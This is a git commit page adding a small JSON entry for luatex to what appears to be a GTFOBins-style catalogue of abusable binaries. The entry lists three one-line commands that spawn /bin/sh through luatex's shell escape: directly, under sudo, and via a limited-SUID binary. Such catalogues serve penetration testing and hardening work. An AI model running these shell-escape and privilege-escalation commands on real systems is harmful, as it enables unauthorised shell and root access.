add data source for luatex

master
Mr. Robot 3 years ago committed by GitHub
parent 8cc3951758
commit dc1634611d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,20 @@
{
"description": "This allows to execute Lua code.",
"functions": {
"shell": [
{
"code": "luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
],
"sudo": [
{
"code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
],
"limited-suid": [
{
"code": "./luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
}
]
}
}
Loading…
Cancel
Save